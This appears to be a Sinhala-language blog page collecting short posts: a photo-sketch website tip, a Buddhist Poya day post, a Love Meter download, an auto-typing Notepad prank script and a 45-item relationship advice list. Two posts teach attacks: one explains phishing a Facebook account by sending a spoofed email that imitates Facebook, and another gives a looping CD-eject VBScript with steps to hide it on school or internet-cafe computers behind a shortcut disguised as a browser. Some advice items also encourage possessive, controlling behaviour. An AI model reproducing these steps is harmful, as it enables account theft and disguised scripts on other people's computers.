හිතට වදින වදනක්.....

යාළුවනේ ඔයාලා බලන පෝස්ටු වල ඔයාලට හිතෙන දේවල් කොමෙන්ටුවකින් කොටල යන්න අමතක කරන්න එපා....... ඒ වගේම ඔයාලගේ කොමෙන්ටු අපිට ගොඩක් වටිනවා :)

February 20, 2015

ෆොටෝ එකක් අතින් ඇන්දා වගේ හදා ගනිමු.

තමන්ගේ ෆොටෝ එකක් ස්කෙට්ච් කරලා එහෙම නැතිනම් අතින් ඇන්දා වගේ සකස් කරලා, යාලුවෝෆේස් බුකියට දාලා තියෙනවා ඔයාලා දැකල ඇති. සාමාන්‍යයෙන් මේ වැඩේ කරන්නේ ෆොටෝෂොප් වලින්. ඒත් අපි ෆොටෝෂොප් එක්ස්පර්ට්ලා නෙවෙයි කියමුකෝ. එහෙම අයට මේ වැඩේ ලේසියෙන්ම කර ගන්න පුලුවන් වෙබ් අඩවියක් ගැනයි මේ විස්තරේ.
ස්නැප්ස් ටච් වෙබ් අඩවියට මෙතනින් යන්න.


Site Link >>>> http://adf.ly/xvon5

චූස් ෆයිල් බට්න් එක ක්ලික් කරලා ෆොටෝ එක තෝරන්න. ඊළගට අප්ලෝඩ්. දැන් ස්කෙච් ඉට්. කොහොමද වැඩේ. ඩවුන්ලෝඩ් කරගෙන බුකියට දාලාම බලන්නකෝ. තව පේයින්ටින්, ඩ්‍රොවින්ග්, අවුට්ලයින්, සිංගල්ෂේඩ් වගේ ඔප්ෂන් ටිකක් තියෙනවා. අර වගේමයි. කරලාම බලන්න.

≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈
◄◄අපිත් එක්ක එකතු වෙන්න►►
◄◄https://www.facebook.com/groups/anammanamgodakde/►►
◄◄අනං මනං ගොඩක් දේවල්.......►►
≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈

මොකද කියන්නේ FaceBook හැක් කරමුද


හැමෝගෙම සිහිනයක් තමයි fb එක හැක් කරන එක. ඉතින් එක් එක්කෙනා එක එක ආකාරයේ ක්‍රම සොයගෙන තියනවා මේ වැඩේ කරන්න. පේස්බුක් මෑතක් වෙනතුරුම ආරක්ශාව සම්න්දයෙන් ඒ තරම් උනන්දුවක් දක්වපු වෙබ් අඩවියක් නෙමෙයි. නමුත් ලෝකයෙන් ආපු එක එක චෝදනා නිසා අද වෙනකොට ආරක්ශාව අතින් පේස්බුක් ටිකක් ඉදිරියට ඇවිත්,

හරි, මන් මේ කියන්න යන්නේ පේස්බුක් සර්වර් එක හැක් කරන ආකරයක් නම් නෙමෙයි. කාගේ හරි පේස්බුක් ගිනුමක් හැක් කරන් ආකාරය. අපිට මේකට පොඩි සොෆ්ට්වෙයා එකක් හොයගන්න වෙනවා එකෙන් කරන්න ඕනේ වෙන කෙනෙක් යවන ආකරයට අපි මේල් එකක් යවන එක. ඒ කියන්නෙ පේස්බුක් එකෙන් යවන විදියට අපිට හැක් කරන්න ඕනේ කෙනාගේ ගිනුමට අපි මේල් එකක් යවනව..
මේ වෙබ් පිටුවට යන්න මුලින්ම


Site Link >>>> http://adf.ly/xvMIr

දැන් මේ තියන රූපය හොදින් කියවල බලන්න.. අපි ලියන මැසේජ් එක බලන කෙනාව නොමග යවන ආකරයටයි ලියවෙන්න ඕනේ.
හරියට FB එකෙන් එන විදිහට තමා....

හරි, ඉතින් මේ ඊමේල් එක ලැබුනාම කෙනෙක් එයගේ පාස්වර්ඩ් එක මාරු කරගෙන නම් අපිට කිසි අවුලක් නැතිවම ඒ ගිනුමට ලොග් වෙන්න පුලුවන්.

≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈
◄◄අපිත් එක්ක එකතු වෙන්න►►
◄◄https://www.facebook.com/groups/anammanamgodakde/ ►►
◄◄අනං මනං ගොඩක් දේවල්.......►►
≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈

CD/DVD Drive එක දිගටම එලියට පනින්න. 100% වැඩ. ට්‍රයි එකක් දීල බලන්න

මේකේ වයිරස් එකක් කිව්වට VBS SCRIPT එකක්. මේකෙන් පරිගණකයට කිසිම හානියක් වෙන්නේ නෑ. මේක මම් මගේ ලැප් එකේ ට්‍රයි කරල බලලා වැඩ කරල කිසිම අවුලක් වුනේ නැති නිසා තමා මේ ට්‍රික් එක දාන්න හිතුවේ. මේකෙන් වෙන්නේ ඔයාලගෙ සීඩී/ඩ්වීඩි ඩ්‍රයිව් එක එක දිගට ඕපන් එන එක. ඒ කිව්වේ ඔයාලා ඒක ඇතුලට දැම්මම අයෙත් එලියල පනිනවා. මේක නවත්තට හැටිත් මම කියලයි තියෙන්නේ.

Notepad Open කරගන්න.


යට තියන කෝඩ් එක Copy >>>>> Paste කර ගන්න...

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

දැන් anything.vbs කියල save කරන්න.
ඒක ඕපන් කරල බලන්න.

නවත්තන හැටි මෙතන......

Ctrl + Alt + Delete ඔබල Task Manager ඕපන් කරගන්න.

Process යටතේ wscriptයන්න තොරා End Process කරන්න

වැඩේ එච්චරයි. වැඩිපුර ෆන් එකක් ගන්න ඕනේ නම් පහත පියවර අනුගමනය කරන්න.
(ඔබ කරන ගොන් වැඩවලට මම වගකියන්නේ නෑ...:පී)

යන්න Internet Cafe එකකට , පාසලේ කොම්පියුටර් ලැබ් එකට, හෝ යාලුවාගේ පරිගණකය ගාවට..

මේ Script එක ඒ පරිගණ්කයේ කොහේහරි හංගන්න. (Local Disk, My Music or anywhere. But not Desktop)

කොපි කරපු ෆයිල් එක Right Click කර Send To >>> Desktop කරන්න.
එකේ ඇති Shortcut එක Rename කරන්න (Games Folder Mozilla Firefox, Internet Explorer, Chrome, වගේ නමකට )

අදාළ නමට Right Click>>> Properties>> Custom>>>Change Icon ගිහින් Icon එක මාරු කරන්න.

≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈
◄◄අපිත් එක්ක එකතු වෙන්න►►
◄◄https://www.facebook.com/groups/anammanamgodakde/►►
◄◄අනං මනං ගොඩක් දේවල්.......►►
≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈

පින්බර නවම් පුන් පොහෝ දිනය



බෞද්ධයා - The Buddhist


ගෞතම සම්බුදු සසුනේ වන්දනීයවුත් පූජනීයවුත් කාරණවන් කිහිපයක් සිදු වූ පින්බර නවම් පුන් පොහෝ දිනය පුරාවටම අපි පිරිනිවී වැඩි රහතන් වහන්සේලා අනුගමනය කරමින් උතුම් උපෝසථ ශීලය සමාදන් වෙමු.


නවම් පුන් පෝදා සිදුවූ සුවිශේෂ සිදුවීම් මෙසේය…

• සාරිපුත්ත මොග්ගල්ලාන මහරහතන් වහන්සේලා ගෞතම සසුනෙහි අග්‍රශ්‍රාවක තනතුරු ලැබුවේ නවම් පුන් පොහෝ දිනක ය.

• ප්‍රථම ශ්‍රාවක සන්නිපාතය වූ 1250 ක් භික්ෂූන් වහන්සේලාගේ රැස් වීම සිදුවූයේ ද නවම් පුන් පොහෝ දිනක ය

• බුදුරජාණන් වහන්සේ විසින් මහා සංඝරත්නයට ඕවාද ප්‍රාතිමෝක්ෂය ප්‍රථම වරට දේශනා කොට වදාළේ ද නවම් පුන් පොහෝ දිනක ය.

• බුදුරජාණන් වහන්සේ පිරිනිවන් පෑමට තුන්මසකට පෙරාතුව ආයු සංස්කාර අත්හළේ ද නවම් පුන් පොහෝ දිනකදී ය.

ඒ භාග්‍යවත්වූ අරහත් වූ ගෞතම සම්බුදුරජාණන් වහන්සේට අපගේ නමස්කාරය වේවා…!!!

::: තෙරුවන් සරණයි...! ::::

Love Meter එක අරන්ම බලන්නකෝ (365KB only)

Love Meter එක අරන්ම බලන්නකෝ (365KB only) ඔන්න අපේකෙනෙක් හදපු තවත් software එකක් ගෙනාවා.... මේක Love meter එකක්.. ඔබේ ආදරවන්තයගේ හෝ ආදරවන්තියගේ අදරය කෙතරම්දැයි මැනගන්න සුපිරි tool එකක් තමා මේ... ඉතින් අරන්ම බලන්නකෝ ,මෙතනින් ගන්න

Download Link >>>> http://adf.ly/xb7PI


≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈
◄◄අපිත් එක්ක එකතු වෙන්න►►
◄◄https://www.facebook.com/groups/anammanamgodakde/►►
◄◄අනං මනං ගොඩක් දේවල්.......►►
≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈


Unlike · · Share

නෝට් පෑඩ් එකක් ඔටෝ ලියවෙන විදියට හදමු ද?

ඔයාලට කියල දෙන්න යන්නෙ Windows වල ඔටෝ ලියවෙන නෝට් පෑඩ් එකක් එකක් හදන විදිහයි. මේක ඔයාලගෙ යාලුවො බයකරන්න, පොඩි විහිළුවක් කරන්න අවස්ථානුකූලව යොදා ගන්න එකනම් ඔයාලගෙ වැඩක්.

මුලින්ම මන් මේ පහල දෙන code එක notepad එකට past කරගන්නකෝ. ඊට පස්සෙ FIle > Save As ගිහින් කැමති නමක් දීල අගට .vbs කියල Save කරගන්න. (Ex: AutoWriting.vbs) ඊට පස්සෙ ඉතින් තියෙන්නෙ open කරල බලන එක තමා. බය වෙන්නනම් දෙයක් නෑ..........


set wshshell = wscript.CreateObject("wscript.shell")
wshshell.run "Notepad"
wscript.sleep 500
wshshell.AppActivate "Notepad"
WshShell.SendKeys "I"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "L"
WScript.Sleep 500
WshShell.SendKeys "O"
WScript.Sleep 500
WshShell.SendKeys "V"
WScript.Sleep 500
WshShell.SendKeys "E"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "Y"
WScript.Sleep 500
WshShell.SendKeys "O"
WScript.Sleep 500
WshShell.SendKeys "U"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "!"
WScript.Sleep 500
WshShell.SendKeys "!"
WScript.Sleep 500
WshShell.SendKeys "!"
WScript.Sleep 500
WshShell.SendKeys "!"
WScript.Sleep 500
WshShell.SendKeys "!"
WScript.Sleep 500
WshShell.SendKeys "!"
WScript.Sleep 500
WshShell.SendKeys " >> I LOVE YOU!!!!!!"

≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈
◄◄අපිත් එක්ක එකතු වෙන්න►►
◄◄https://www.facebook.com/groups/anammanamgodakde/►►
◄◄අනං මනං ගොඩක් දේවල්.......►►
≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈

කොල්ලන්ට ඉතාම වැදගත්, පෙම්වතිය වැඩිපුරම කැමති, එත් කිසිදා වචනයෙන් නොඉල්ලන දේවල් 45ක්.

අද ඔයාලට දෙන්නේ අමුතුම පොස්ට් එකක්. අද කාලේ 90% කොල්ලන්ට කෙල්ලෙක් ඉන්නවා.
මේකේ තියෙන්නේ කෙල්ලෝ වැඩිපුරම කැමති, එත් කවදාවත් වචනයෙන් ඉල්ලන් නැති දේවල් ගොඩක්.
කියවලම බලන්නකෝ එහෙනං.

1. හැකි සෑමවිටකම ඇයව ඔබට තුරුල්කරගන්න.
2. ඇයත් සමඟ හැකිතරම් කතාබහ කරන්න.
3. ඔබේ රහස් ඇයත් සමඟ බෙදාගන්න.
4. ඇයට සීතල දැනුණ විටදී ඇයව උණුසුම් කරන්න.
5. ඇයව සිපගන්නා විට කලබල නැතුව සෙමින් ඇයව සිපගන්න.

මේ දේවල් අමතක කරන්නත් එපා . . .
6. ඇයව වැළඳගන්න.
7. ඇයගේ අතින් අල්ලගෙන සිටින්න. තප්පරයකට දෙකකට වුනත් ඔබ ඇයගේ අතින් අල්ලගේන සිටීම ඇයට සතුටක්.
8. ඇයත් සමඟ සිනහවෙන් කාලය ගෙවන්න.
9. ඇයත් එක්ක ගමන් යන්න ඇයට කතාකරන්න. ඔබත් එක්ක ඇවිදින්නට ඇය හුඟාක් කැමති වේවි.
10. ඔබගේ මිතුරන් ඉදිරියේදී ඇයත් සමඟ එකට සිටින්න. ඇය ඔබේ පෙම්වතිය බව මිතුරන්ට හඳුන්වාදෙන්න.

නිදහස් තැන්වලදී . . .
11. ඇයත් සමඟ සුහදව සිනාසෙන්න.
12. ඇයත් සමඟ එකට සිට ඡායාරූප ගන්න.
13. ඇයව ඔබගේ උකුල මත හිඳුවාගන්න. ඇයට යන්න නොදී තදින් ඇයව අල්ලාගෙන ඉන්න.
14. ඇය කිව්වොත් ඔබ ඇයට ආදරේ කරනවාට වඩා ඇය ඔබට ආදරෙයි කියා ඒකට විරුද්ධ වෙන්න ඇයත් සමඟ තර්ක කරන්න. ඇයට දිනන්න දෙන්න එපා. ඔබ දිනනවාටයි ඇයත් කැමති.
15. ඇගේ යාලුවෝ කිව්වොත් ඔයාට වඩා එයාලා ඔයාගේ පෙම්වතියට ආදරෙයි කියලා එය ප්‍රතික්ශේප කරන්න. ඔවුන්ට විරුද්ධ වෙන ගමන් ඔබේ පෙම්වතියව තදින් අල්ලගෙන සිටින්න, ඇයට යාලුවන් දෙසට යන්න දෙන්න එපා. ඔයාට මේක කියවද්දි කාවහරි මතක් වෙනවද ?
16. ඔබ ඇයව හමුවූ විට ඇයව වැළඳගෙන ඇයට ආදරෙයි කියා පවසන්න.
17. ඇය බලාපොරොත්තු නොවන අවස්ථාවලදී ඇයව සිපගන්න.
18. ඇයට හොරෙන් පසුපසින් ඇවිත් ඇයව බදාගන්න.
19. ඇය ලස්සන බව ඇයට පවසන්න.
20. ඇය ගැන ඔබට හිතෙන දේවල් ඔක්කොම ඇයට පවසන්න. ඔබ ඇය ගැන සැලකිලිමත් වෙන ඇයුරු ඇයට පෙන්වන්න
21. ඇයත් සමඟ යනවිට ඇය වෙනුවෙන් දොරවල් විවෘත කරදෙන්න. ඇය වාහනය නගින තෙක් ඇය සමඟින් ඉන්න. ඇයව මහමග තනිකර දමායන්න එපා. සැමවිටම මහත්මා ගති ඇතිව කටයුතු කරන්න.
22. ඔබේ වටිනාම වස්තුව ඇය බව ඇයට පවසන්න. මෙය කියනවිට අවංකවම කියන්න. බොරුවට කියන්න එපා.
23. ඇය නොසතුටෙන් සිටිනවායැයි ඔබට හැඟුනොත් ඇගෙන් ඒ ගැන විමසන්න. ඇය එහෙම දෙයක් නැහැ කිව්වොත් ඇයට ඒ ගැන කතාකරලා හිත නරක් කරගන්න අනවශ්‍යයි, ඒ නිසා එහෙම කිව්වොත් ඇයව ඔබට තුරුල් කරගෙන මොහොතක් නිහඬව ඉන්න.
24. ඇයට ඔබගේ ආදරය නිරතුරුව දැනෙන්නට ඉඩහරින්න
25. ඔබ හඳුනන අනික් ගැහැණු ළමුන් ඉදිපිට ඇයව සිපගන්න. ඔබ ඇයගේම පමණක් බව ඇයට සිතේවි. ගැහැණු ළමයි සමහරවිට මේවා ඇත්ත නෙවේ යැයි කියාවි, නමුත් ඇත්තටම එයාලා මේ දේවල්වලට කැමති බව ඔවුන් දන්නවා
26. ඇයට කවදාවත් බොරුවක් කියන්න එපා.
27. ඇයට කිසිදිනක වංචා කරන්නත් එපා.
28. ඇය යන්න කැමති ස්ථාන වලට ඇයව රැගෙන යන්න.
29. හැමදාම උදේට ඇයට සුබ දවසක් ප්‍රාර්ථනා කරලා කෙටි පණිවිඩයක් හෝ දුරකථන ඇමතුමක් දෙන්න. ඒ සමඟම ඔබට ඇය කෙතරම් මතක් වෙනවාද කියලත් ඇයට කියන්න.
30. ඇයට ඔබව අවශ්‍ය වෙන අවස්ථාවන්වලදී ඇය සමඟ සිටින්න, ඇයට ඔබගේ උදව් අවශ්‍ය නොවෙන විටකදීත් වුවමනා වුනොත් ඔබ එතන සිටින බවට තහවුරු කරන්න. එය ඇයට ශක්තියක් වේවි. ඉතිරියත් කියවන්න, ඔබට මේ කරුණු වැදගත් වේවි
31. ඇයට සීතල වූවුට ඇය අසලින් සිටින්න, ඇයට ඔබට තුරුල්වී සිටීමට ඉඩදෙන්න.
32. ඔබ ඇයත් සමඟ තනිවුණු මොහොතක ඇයව වැළඳගෙන සිපගන්න.
33. ඇයගේ දෙකොපුල් මුලින්ම සිප ගන්න.
34. ඇයගේ බඳවටා අත යවා ඇය ඔබට ළං කරගන්න. ඇය ඔබගේ උරහිස මත හිස තබා ගනීවි, ඒ ඇය කැමතිම දෙයක්, ඇයට ඒ සතුට විඳින්න ඉඩ දෙන්න.
35. විහිළුවටවත් ඔබ ඇයව ඇත්හැර යන බව කියන්න එපා, ඒක ඇයව ගොඩාක් දුකට පත්කරාවි ඊළඟ වතාවේදී ඔබ ඇයත් සමඟ සිටින විට මේ දේවල් මතක් කරගන්න
36. අන් අය ඇයට කරදරයක් කරන විට වහාම ඊට විරුද්ධව නැගී සිටින්න.

37. ඇයගේ ඇස් දිහා බලාගෙන ඇයට ආදරෙයි කියන්න.
38. තරු පෑයූ රාත්‍රියක ඇයත් සමඟ සිටින විට ඇ‍යට ඔබගේ පපුව මත හිස තබාගන්න දෙන්න, ඇයට ඔබගේ හදවත ගැහෙන රාවය අසන්නට ඉඩදෙන්න, ඔබගේ අතැඟිලි පටලවාගෙන ඇගේ කනට රහස් මුමුණන්න.
39. ඇයත් සමඟ ගමන් කරන විට ඇගේ අතින් අල්ලාගෙන යන්න.
40. ඇයව වැළඳගත් විට හැකිතරම් වේලා ඇයව ඔබට තුරුළු කරගෙන ඉන්න. ඇයට ඔබගේ ආදරය හොඳින් දැනෙන බවට සහතික වන්න.
41. ඇය නිදාගැනීමට කලින් ඇයට සුබ රාත්‍රියක් හා සුබ සිහින පතන්න.
42. ඇය හඬන විට ඇයව සනසන්න , ඇගේ කඳුලු පිසදමන්න.
43. ඇයත් සමඟ රාත්‍රියේ ඇවිදින්න යන්න.
44. නිතරම ඇයට ඔබ කොතරම් ආදරේද යන්න මතක් කරන්න.
45. ඇයත් සමඟ සිටින විට ඇයට ඔබේ ආදරය පවසා ඇය කිසිවක් කීමට කලින් ඇයව සිපගන්න....

≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈
◄◄අපිත් එක්ක එකතු වෙන්න►►
◄◄https://www.facebook.com/groups/anammanamgodakde/►►
◄◄අනං මනං ගොඩක් දේවල්.......►►
≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈